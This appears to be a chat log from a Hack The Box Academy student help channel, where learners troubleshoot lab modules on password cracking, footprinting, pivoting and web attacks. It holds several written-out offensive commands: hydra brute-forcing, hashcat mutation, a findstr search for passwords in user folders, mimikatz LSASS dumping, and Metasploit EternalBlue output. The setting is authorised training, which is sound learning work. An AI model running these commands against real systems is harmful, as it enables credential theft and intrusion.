||I have the B......vhd, I tried to mount it via guestmount, but it wants a passphrase. I'm stuck here for some while, I tried bitlocker2john but I can't get a hash out of it, am I even on the right path?||
Yeah lmao, easy boxes seemed impossible back then
Good times
Yeah hahaha, I remember the FriendZone one. Bunch of DNS enumerating iirc. Had nooo clue what I was doing. Or some other one, random exploit go brrrrr, didn't even know what those exploits did
Hello
Running with python2?
No, the binary from bitlocker2john
Hi. If I buy the "HTB Certified Web Exploitation Expert" exam ticket, do I have the full course to prepare for the exam as well?
#modules message
I was referencing this message which marcie answered.
Sadly I haven't done it yet since I got ill and I'm right before it...
You first need to do all the needed modules. The exam ticket doesn't give you access to those modules. It's separate
You do the path
are you talking about " Bug Bounty Hunter " and " Senior Web Penetration Tester " path?
.
Aah ok, thank you. I'm a cybersecurity student (I have the email from my university) and after the membership I can't take "Senior Web Penetration Tester" for free
Am I forced to buy a lot of cubes and spend a lot of money to get this path?
Only T0 are free
Everything else costs cubes, you either buy Gold or Platinum or another monthly sub to get cubes
But if you have the edu email, you can get to T2 I think, all modules for 8€ per month
Yes, I'm already a premium member
I can access every module and pentesting path but not Senior Web Penetration Tester
I checked the price and it is really expensive to buy cubes
$1000 / year only to get Senior Web Penetration Tester
You have to buy T3 and T4 modules with cubes or buy the Gold annual subscription
I think it's wrong for a student that wants to improve their own skills. It's really expensive
It is much cheaper to buy 6000 cubes with the Platinum subscription
Ima try it out
And it is still much cheaper than, for example, OffSec
It's not wrong lol? If you want to learn harder stuff be prepared to pay more
I know but OffSec certifications are a must to get a job as a pentester
I mean for the companies
HTB certifications are not required. It's only knowledge
Idk about a must
HTB certs are fairly new, unlike OSCP for example which has already been in the industry a long time. CPTS will teach you more and the modules are far better refined than the OSCP ones.
But I'd guess it's not standard yet since it's fairly new
yes , i like htb
And OSCP costs 1500-2500 while HTB costs
250-500€
I know but for the companies, if you want to be a pentester, you need to have the OSCP cert. Until some months ago it was just an asset but it is a must right now
Afterwards I like HTB, it was just for the expensive price of that module
That's a limiting belief
You get access to 70 modules and that's not enough?
More advanced modules cost more money, it's as simple as that
It's enough, I just claimed that the price for the Senior Web Penetration Tester is really expensive and should have been cheaper
Have you taken it?
But it's ok. As I told you before I really like HTB and the modules are better than OffSec
It's cheap compared to other certs at a similar level
It's called senior and not beginner/intermediate
I'd be happy to get a deal like that
I don't even have the python2 version of bitlocker2john
Well I haven't done it but maybe just add the python2 before the bitwardenjohny2?
Like to run the bitwarden with python2 instead of 3
Is bitwarden the same as bitlocker?
CROSS-SITE SCRIPTING (XSS) --> Phishing --> document.getElementById('urlform').remove(); is the given example to deface parts of a website but this method does not work. It only seems to add the remove cmd as in plain text on the website.
No
Nope. 2 different things
python2 bitlocker2john.py file
Ah i see the command now
Hard to try to help without knowing that's needed
I don't have the Python one, just the binary, don't know why
The 2john files are Python
file bitlocker2john
ARM aarch64
So no version for my chip?
I thought py is compatible with all archs
Probably download the x64 version of John the Ripper
amd64 / intel64
Not sure if it would run
Well, that's not a Python file, it's an ELF, so the architecture matters
Are you using ARM?
But I have an ARM, so why download amd64?
hey there, I'm new to cybersecurity, I mean basically beginning from scratch with 0 knowledge.
Can anyone tell me which modules to start from
ah
idk then, maybe it doesn't work there
You can use PwnBox
Yeah, I'll give it a shot
Information Security Foundations path
Alright, thank you so much!
lol, also no Python one on PwnBox
any stable distro
Yeah, just trying running that
Took a look at the repo, there's no Python version of it
I must have been thinking of a different 2john file
Just say "works on my machine"
Hi, can anyone solve my doubt? I'm studying the module "Password Attacks" and I'm doing the labs. So, I finished the medium lab, but I don't understand why this solution works. Does it work because root made this file?
can someone give me another hint for the easy footprinting lab? Is there something I can google like a concept that will get me started finding the answer? I'm doing the lab and I'm stumped as to what to do and need a push in the right direction
I want to solve at least this first easy lab today
thanks
if there's something I can research that will help me figure it out that would be great
Did you enumerate which services were open?
services don't always run on standard ports either, so if you're not getting anywhere on any service you enumerated you may need to expand your enumeration of the box with a full port scan.
You have the credentials?
Yes, but it is blocking SSH connections. Do I need to try a different SSH port?
And do I just google how to do that with the ssh program?
It doesn't mean they are for SSH
It's maybe for a different service.
ok thanks
I am doing an ACK scan because yesterday my stealth scans were blocked
we'll see what this gets me
There are no blocked scans on footprinting
^
You can DM me if you're struggling
Hello guys, I'm currently doing the Password Attacks module and it's been getting a bit confusing, just need some clarification
Are LSA secrets the same as the LSASS service cache (which contains hashes for running sessions and services)?
Also there are numerous ways to dump those hashes remotely and locally, however does mimikatz (using sekurlsa::logonpasswords) dump SAM or LSASS or BOTH?
sekurlsa::logonpasswords dumps LSASS
thanks guys
Google is the most important resource of a pentester
I figured out easy footprinting lab with a little help
thank you @cloud urchin and everyone else who decided to help me
Howdy. I am doing the Password Attacks Module and I am in the Password Mutation Section. I am doing the question " Create a mutated wordlist using the files in the ZIP file under "Resources" in the top right corner of this section. Use this wordlist to brute force the password for the user "sam". Once successful, log in with SSH and submit the contents of the flag.txt file as your answer."
I have been bruteforcing FTP with hydra using 64 threads after making my mutated list through hashcat.
Yet this has taken me more than 30 min. I have researched and it usually takes ~30 min, and I do not want to spend hours on this one question when I can move on.
I ran this command to get my mutated list
hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
and then ran this in hydra
hydra -l sam -P mut_password.list ftp://10.129.202.64 -T 64 -I -vv
Started at xx:11 PM and it's now xx:52 PM
Around 40 min is how long it has taken.
I have not cut the first 19k words in the list like stated, due to me being way too deep into the bruteforce to do so. So any suggestions or advice on how long this can take, or if I did something wrong? Ping me if so here, thanks
I would say without trimming ~30 minutes
How many words should I cut from the mutated list to maximize efficiency? I've been here for a min
I think 17k is the common one that's mostly reliable up through most of it (save to a new list name/keep the original mutated list)
I'm gonna remove passwords with less than 10 characters, does that help?
that's the hardest section of the whole module lol
lol my friend had stopped here too
Not sure that's helpful
Because it wasn't working for him
Spent 2 and a half hours on it
Lawd
48 threads is safest
Did you attack ssh?
I did at the start but I know SSH bruteforce is slow as shit
At least you're not trying ssh. Though there is a tool, ssb, that makes ssh bruteforce speedy
Gotcha
But I at least recommend the intended tools first
Yup
Similar philosophy I had with footprinting/services I used a gui email client. Then learned the cli way, which was far more fun to do
Since we're here, does anyone have an easy explanation for what exactly DPAPI keys do? Do they just encrypt passwords associated with services and so on?
I did the CLI way first, then was like hmmm this should be waaaay easier via the GUI. 2 clicks and the flag was there
I know this post is old but I just came here to say thank you. Was driving me nuts. lol
There are times where ChatGPT can explain it very well too, and if you're not getting it you can always tell it "explain it even easier"
https://academy.hackthebox.com/module/113/section/1213 any ideas why the shell is not coming?
Triple checked everything and no shell
worked for me
show your reverse shell splunk directory with 'tree'
if the directory structure is setup correctly, you should be able to modify the files with your ip/port info to get the reverse shell, create a tarball, then deploy the payload
Well, I created that structure locally, created the files, updated with my IP, created the tar, opened nc, uploaded them... no shell
then we would need more detailed information of exactly how you set it up, because the steps outlined in the section definitely work
you're likely missing some configuration setup step
I don't understand what I'm doing wrong here. I don't know enough to understand the nuances of ' and ` and ", I copied the text straight from the module so I'm very unsure why it's not working.
I haven't done that module, but from the message it looks like your json data is missing some values. I'd try to enumerate the endpoint to see what details are missing and fill those in.
I need help on Skills Assessment - File Upload Attacks, I can't seem to find a way to bypass the MIME type or content type. I already read upload.php via XXE but no idea comes to mind to bypass it
I'll try that, thank you!
Did the same as you, and didn't face that error - mind copy / pasting what you're executing? I copy / pasted from the module page also and it seemed to work
You can use hexeditor
(by DM)
the upload.php should give you an idea of the naming convention and url format.
dang my box went down just before i got the flag and now i can't get back in even after restarting. can't ping it either.
there we go
THANK YOU
I have tried a fair number of things at this stage and I still get the cert error. Can someone confirm that this exercise is doable?
#modules message tells me we need to run JDK/JVM 11 for this (I'm guessing due to Oracle licensing shenanigans avoidance)
I think that probably wants writing somewhere because it took a fair bit of digging to sort that.
I can't install crackmapexec - I'm getting the following error:
Building dependency tree... Done
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
crackmapexec : Depends: python3-neo4j but it is not installable
E: Unable to correct problems, you have held broken packages.
you could try netexec, which is the successor to cme. https://github.com/Pennyw0rth/NetExec, otherwise it looks like you'd need python3-neo4j. your error says you have broken packages.
I tried installing python3-neo4j - no dice. Thank you for the NetExec suggestion. So essentially that does the same thing?
yes, it's essentially the exact same thing but maintained. same command syntax, same output, everything is the same
Very nice, thanks for your help.
Hi everyone, has anyone had this issue on the Print Spooler & NTLM Relaying module in the SOC Analyst path where impacket-ntlmrelayx -t dcsync://172.16.18.4 -smb2support is throwing an error?
I keep getting the HMAC error: key: expected bytes or bytearray, but got 'int'
anyone else with this problem?
Yes, I can't load a VM either
I just got rick rolled in web attacks
Anybody else having issues connecting via VPN? Keep on erroring out trying to remote desktop into target VM
That's funny af
EU Academy 2 TCP is working fine for me
Could someone help me by explaining the question to me a bit more?
" Find additional information about the specific share we found previously and submit the customized version of that specific share as the answer."
I have done all the other questions for this section, just don't understand what it is asking
This part isn't making much sense to me " customized version of that specific share"
For context this is HTB Academy Footprinting SMB
happy new year all of you guys....
NVM, got it
It literally just wanted what was in the comment section of the SMB listing.
netsharegetinfo sambashare just in case
ohhh
Thanks @dry halo. I just ran a listing and got the information haha. But thank you anyway
NMAP module: it shows "To have a clear view of the SYN scan, we disable the ICMP echo requests (-Pn), DNS resolution (-n), and ARP ping scan (--disable-arp-ping)."
Questions:
- What exactly does a 'clear view of the SYN scan' mean?
- In which situations do we disable the ICMP echo requests? Same question for ARP ping, and in which situation would I leave ARP ping ON?
- Are there any Wireshark screenshots? If yes, maybe to remove unnecessary noise and also maybe on the target
- When hosts are configured to not listen to ping requests. Disabling ICMP echo requests can also help avoid detection as some IDS or firewalls may log or block ICMP traffic
- ARP can sometimes be used for stealth scanning (works in layer 2); if ping is blocked we can use this.
for local network discovery, host detection
Ty
I am trying to run an SQLi with SOAP and I am getting this error. I used the extension Wsdler to have something correct but... https://academy.hackthebox.com/module/160/section/1475
Getting the same problem as default:
I found the problem by comparing with forums etc.
Hi HTB dudes, do you know what's the password of the attacking machine in HTB Academy?
In the Using Crackmapexec course, Targets and Protocols section, the last question is "What's the full name of the smb module that starts with zero? " I feel like I am missing something obvious here, I have looked for both 0 and zero but I cannot figure out this question...
When you initially log in, you will be notified of these credentials
I did not get this? I just pressed the start button and the machine came out?
Do you know the password of that instance?
Not that one. The attack machine, that's the target machine?
If there are no creds, you don't need any
you mean the pwnbox?
The creds are on the Desktop
Hmm, I would like to connect from my target machine to my attack machine through RDP? Why is RDP asking for a password?
Yes, PwnBox
Why do you want to access the PwnBox with RDP?
Use either the PwnBox in the browser or your own VM with VPN
An additional machine in between only makes the lab unnecessarily slow
And why does the HTB target machine keep timing out my remote session? Hmm, they should fix this.
Why not provide an all-in-one platform? Hays
Paid 500 USD and the service is not fully provided hayys
There can be various reasons for this.
It could be due to the HTB server, it could be due to your network, but it could also be somewhere in between
Contact support so that this can be investigated
The PwnBox in the browser is an all-in-one platform solution
Reach out to support
Okay, thanks for your time. Hope they action users' complaints.. thinking of moving to TryHackMe. But not sure if their service is better than HTB.
htb
As already mentioned, performance depends on many factors
htb is more betterer
No it's not. Why need to use another VM? Why don't they add more VMs?
You don't need your own VM. You can use PwnBox
Use either the PwnBox or your own VM with your tools, settings, etc
Does it cost them money? If yes, their subscription is expensive. Why don't they spend that money to make a better platform, so that users will be satisfied?
The PwnBox is included in the modules
You can also use your own VM free of charge. It just depends on your setting
VirtualBox is free of charge. Parallels on Mac costs a license fee.
It depends on what you can and want to use
But that has nothing to do with HTB.
Dude, I was asking to RDP to my PwnBox from my target machine. But it won't let me because RDP obviously needs password credentials to be able to establish a remote connection.
Did you get that?
Hi guys! I have a question from a module. It's theory-wise
" Workstations should be on their own network, and in a perfect world, each workstation should have a Host-Based Firewall rule preventing it from talking to other workstations. "
Isn't such a firewall rule interfering with the normal work if the workstations cannot communicate between themselves? If I want to send something to my colleague (a file for ex)... can I do it with such a rule?
Bro, why do you want to establish an RDP connection to your PwnBox? That makes no sense.
Either use the PwnBox in the browser or use your own VM.
the credentials are literally provided.
did you get that?
Lol you guys don't get what I mean.
there's no need to rdp to pwnbox, it's in your browser
Dude, I want to share a drive from my Windows target machine to my PwnBox. Isn't that clear?
The PwnBox is an in-browser solution. You operate this machine via a browser.
The creds are on the Desktop
so if you want to 'share drive', then the goal is to get a file from the target?
If I understand that correctly, there's no need to 'share drive', you have other methods
Re: HTTPS/TLS attacks skill assessment. The target box is available for 90 minutes and isn't extendable. I just got the "admin token" after waiting over an hour for the padbuster process to encrypt the plaintext.
I ran only the padbuster command having decrypt it on the last target (which also ran out of time)
Are things simply that slow or is it possible to speed it up?
Can I ask if the token is generated every time or if I can re-use the same one?
Otherwise, if there's a new token every time, there seems to be no way to complete this module with the time available.
If you are in such a network, you will never send files directly to your colleague, but store the file on a drive to which both of you have access.
To be clear:
The only command I had time to run in the 90 minutes was the padbuster -plaintext command.
So is it a network thing or can I make it go faster somehow
oh, ok, I got it. Thank you!
No, but if I remember correctly, the key is provided
which key sorry?
Can we DM so I don't give too much away here @acoustic owl ?
sure
rdp and drive sharing are two completely different things, and you've never said that you wanted to share a drive, lmao
Why are you pinging yourself?
hello
is the mcverify thing manual
Dude thanks for your help.
However the HTB Windows machine keeps reconnecting all the time, which is a waste of time for me. Need to chase the module as my subscription is nearly at its end.
Really hate this
If you connect from your machine to the PwnBox via RDP and then access the Lab from there, don't be surprised if the connection is interrupted from time to time.
Use either the PwnBox in the browser or your VM
But never both at the same time
Yes dude that's what I'm doing now.
But it's really bad, it makes me think of moving to another platform. So freaking mild issue but it's a big deal for me as I'm chasing to finish the module.
It's a waste of time. HTB, please fix your Windows box. It bothers me a lot. I have a premium subscription which is expensive for my current status.
There is no Premium subscription in the Academy.
Do you mean the silver annual subscription?
If you have connection problems, please contact Support
I think there's an issue at the moment as I've been waiting an hour to get Pwnbox stable enough to work. It's usually great for me
OneUptime - the complete open-source observability platform.
The last entry was from April 11th
It could be my wifi. I'm gonna cut the grass and try again later
Hi guys. I'm terribly stuck on the Pivoting, Tunneling, and Port Forwarding module's skills assessment. Can anyone guide me on how to proceed? I discovered the last machine, have creds, but when I log in from the pivot Windows host with mstsc.exe, even though my IP changes I still see the same flag on C: as I saw on the pivot Windows. And I can't see network disks connected. What am I doing wrong here?
Cheers everyone
I've got stuck (motivation-wise) recently as a very much beginner. I thought the SOC Analyst path would be a good start as I had the most progression on it after my initial paths / modules. But somehow that path feels in many places like you'd need to have quite "random" knowledge. Going through the lab logs with Wireshark is a very nice way to learn, but somehow I rarely understand why I should be looking out for this or that specific packet / flag / whatever. I did not do great in the labs and when I found solutions online, I was still not able to UNDERSTAND why it works. This path feels a lot like "learning by heart" and not like "understanding what you do". And here I came across an idea: maybe that path is simply not meant to be chosen first. Does this knowledge feel less arbitrary / random if you have done some pen-testing / bug-hunting first? Thanks
can someone help me with the http attacks. I am getting errors that make no sense at all "invalid chunked encoding length"
there is no such thing as an "invalid chunked encoding length"
Have you done the SOC Analyst Prerequisites path beforehand?
The SOC Analyst path builds on this knowledge.
Hello guys, I'm stuck at the Web Attacks module in the Mass IDOR Enumeration section. Long story short, it says that the URL parameter should contain (?uid=1 or any number), however that's not the case, and when I tried to add it myself it didn't show anything (tried to curl it too but it didn't work). I don't understand the problem; I'd be glad for any help (I did pwnbox my machine and restart the target, and that didn't work).
update:
I didn't use Burp Suite, yes I am dumb
Good point, I actually did not know that it exists. I just checked it out: I do have 90% of that Prerequisites path. So my final answer would be "mostly, yes" :D. (I'm missing half of the "Intro to Assembly" module)
I feel a bit like "as long as I don't know what an attacker would do, I don't understand what I need to watch out for". I'll try the basic bug-hunting / pen-testing stuff for now. Either I'm right about my assumption, OR I'll end up with a situation in which I think "without understanding system defenses, I don't understand what I'm doing as an attacker" again :D. Still, thank you for your reply and help!
Can someone help me out with HTTP attacks? It's impossible to know if the MailHog is just dead, like with the SMTP headers, or I am actually doing it wrong.
I can help u, dm ok?
Hey guys, I am having issues in SHELLS & PAYLOADS -> The Live Engagement
I cannot access Target via my pwnbox
Anyone experiencing same issue?
You can only access the machines via the target
So for example they provide you with the RDP creds. You need those to, for example, xfreerdp to the target, and from that target you can access the other 3
Yep, I understand that for those 3 internal objects, I have to login to TARGET first, and use TARGET as a jump box to do further penetration testing, it worked before. But now I have trouble login on TARGET itself.
Have you tried switching to TCP VPN? TCP is more stable than UDP
I think Pwnbox uses the same connection type and region as your selected OpenVPN one, but I'm not 100% sure. I remember having trouble getting a stable connection as well in the beginning, but after trying some different EU academy connections and switching to TCP it worked. But I used my own machine
Thanks mate, it's working now
Good luck! I had a fun time doing the live engagement!
Can someone explain this to me a little further?
Aren't these 2 statements talking about the same thing?
How can one be packet crafting and the other malicious when both are outside of the LAN? I'm just confused
Firewall and IDS/IPS Evasion - Hard Lab
Now our client wants to know if it is possible to find out the version of the running services. Identify the version of service our client was talking about and submit the flag as the answer.
I know what the suspicious port is, but I can't seem to get my netcat to work. Can someone hint me on this? It will just say connection refused.
You had to use a specific argument for nmap to make it work correct?
can i pm you?
Sure
I like to ping myself.
Anyone facing difficulty in connecting with target?
Target ip is not up. already 5 minutes have passed. i tried pinging, all packets lost.
Hi, I'm doing the first part of the Skill Assessment of the Active Directory Enumeration & Attacks module.
On the Windows foothold host, I discovered two IP addresses for AD hosts. What's the best way to figure out their hostnames? Using dig on the nameserver, there's only an A entry for itself. When I use nslookup with the name server, I get a connection timeout error.
nmap could show their host names
I'm hesitant on using nmap because I have to tunnel the scan through a proxy and it takes forever, especially if I'm running scripts... I figured that there must be an easier way to do it from a domain-joined host.
netexec
Looked at netexec documentation, nxc smb <ip> reveals hostname. Thanks.
You can't ping everyone
Everyone @acoustic owl
fk

That's the Reporting module complete. Just AED between here and the exam. I'm scared 
Don't be
where the mods at 
Bunny already had the finger on the mute button
I'm struggling with the last question on the DNS section of the Footprinting module, can I get an assist from someone?
"What is the FQDN of the host where the last octet ends with "x.x.x.203"? "
Pretty sure the question is trying to get me to brute force. The hint says something about trying different wordlists; I tried all the SecLists ones but still can't find anything with the octet 203. What other subdomain wordlists are there?
Ok, I managed to make this work without any issues. Just a word of warning, make sure you run the commands as root or with sudo. Don't be a dumdum like me 
The password you are looking for could be case insensitive, so try to adapt your command to such case : findstr /S /I /C:"password" "C:\Users\*"*.txt *.ini *.cfg *.config *.xml
that was two months ago T-T lol
smtp footprinting. smtp-user-enum is a big mess. changed timeout too, still unable to get valid user. also the target ip gets down in between. bruteforcing a whole mess.
Are there any problems with the HTB infra?
Well you need to bruteforce a || subdomain || and the wordlist needs to be fierce. Hope that gave you a little nudge
i mean the VPN is taking loooonnggg time to connect
Is there maybe an SSTI on a server only if it's using Flask from Python?
You using smtp-user-enum? What's the timeout you set?
Check all the discovery wordlists from SecLists. Also perform the zone transfer on all subdomains (use any wordlist). Once you find all subdomains which allow zone transfer, check all discovery wordlists by SecLists. Hint: fierce
100? That's 100s if you're using the mentioned script
Yeah. Now used the different smtp-user-enum. Works a lot better
Right, I think I know which one you used... Had trouble on that one as well, but used the mentioned one and 15s was the sweet spot
Working on the last question on the live engagement portion of Shells and Payloads: "Exploit and gain a shell session with Host-3. Then submit the contents of C:\Users\Administrator\Desktop\Skills-flag.txt" I've identified the Metasploit module I'm supposed to use, set rhosts and lhosts, but it doesn't work:
```
msf6 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on host-ip:4444
[*] 172.16.1.13:445 - Target OS: Windows Server 2016 Standard 14393
[*] 172.16.1.13:445 - Built a write-what-where primitive...
[+] 172.16.1.13:445 - Overwrite complete... SYSTEM session obtained!
[*] 172.16.1.13:445 - Selecting PowerShell target
[*] 172.16.1.13:445 - Executing the payload...
[+] 172.16.1.13:445 - Service start timed out, OK if running a command or non-service executable...
[*] Exploit completed, but no session was created.
```
It seems to have worked last year according to this walkthrough: https://medium.com/@thummardarshil1998/shells-and-payloads-895385fd871d Did something change?
Did you set the right lhost?
Yes, it's supposed to be the ip of the foothold box right?
Yea
I mean if you find out the exploit needed, you only need to set lhost and rhosts
It's specifically the ip that's on the same subnet as the 172 machine
It's not the 10.129.x.x
Hello peeps, could I ask those who have done AED blind. Is it all one lab or something? There doesn't look to be an assessment to jump to.
[*] Started reverse TCP handler on host-ip:4444
If I don't look at the questions, how do I answer them?
You don't
You just start the lab and just go for full network compromise
Your lhosts doesn't seem to be correct.
You don't look at questions until after you have full compromise
Ah cool, so it's the same IP in each section? Just grab the one from section 1 and have at it?
I am currently brushing up on my Linux fundamentals, using the Linux Fundamentals module and I have noticed that assignments can be very narrow when it comes to accepted responses. For example:
In /module/18/section/74, the first assignment talks about "starting a simple web server using NPM" even though npm, as a package manager, isn't designed to do so. A combined && command of npm and npx to install and run the required service isn't accepted as a valid answer, nor is using just the npx command. Only after looking at the hint did I realize that the only accepted answer is to run the package command directly without npx.
I think the assignment as a whole could be less of a non-sequitur onto itself, but my actual question is: When preparing for HTB certifications, should I specifically study the assignment-response patterns of the modules and practice to anticipate those or do the exams have more sophisticated validation of whether an assignment has been completed with a fully valid solution?
I apologize if this question sounds annoyed, I'm not, I really just want to know whether I need to take this sort of consideration into account while practicing for certifications. Sorry I didn't post the full assignment and actual commands I tried, I didn't want to spoil it for anyone.
Nevermind
I actually read the intros a few days ago
I see the Scope now
You can start a server with npm
" Keep in mind that the Foothold host has access to the Internal inlanefreight network (172.16.1.0/23 network) "
curious, how would I go about that?
Sec
What's your LHOST? Because from the code you provided it says HOST-IP:4444
Also use the section name not the endpoint
The numbers mean nothing
the 10.129.x.x, obfuscated it in case there's weirdos
@fathom pendant Working with Web Services
feel like I'm in a dream not knowing what's going on
Why 10.x.x.x? That's wrong. You don't have access to it. Only 172.x does
I take it you put npm... then http... -p8080?
Jeez, I just started taking cybersecurity courses. I don't know where to start to improve my skills
You just need the http... 8080 part
Cuz they have it set up so only 172.x.x can communicate with it. That's why they gave you the foothold machine as well. How did you get the reverse shell from machine 1 then, if you didn't use the foothold machine's IP?
@fathom pendant I have the correct answer, yes
You have access to the subnet through the interface that's assigned the IP
Ok so you answered the question?
The confusion comes from the module used being a part of npm; it's not its own standalone command
@fathom pendant Oh yes, but it was very unintuitive for me. I tried it with "npm i http... && npx http... 8080", which worked like a charm in my Parrot VM, wasn't an accepted answer. "npx http..." wasn't either, nor "npm http...", only "http..." without npm or npx worked.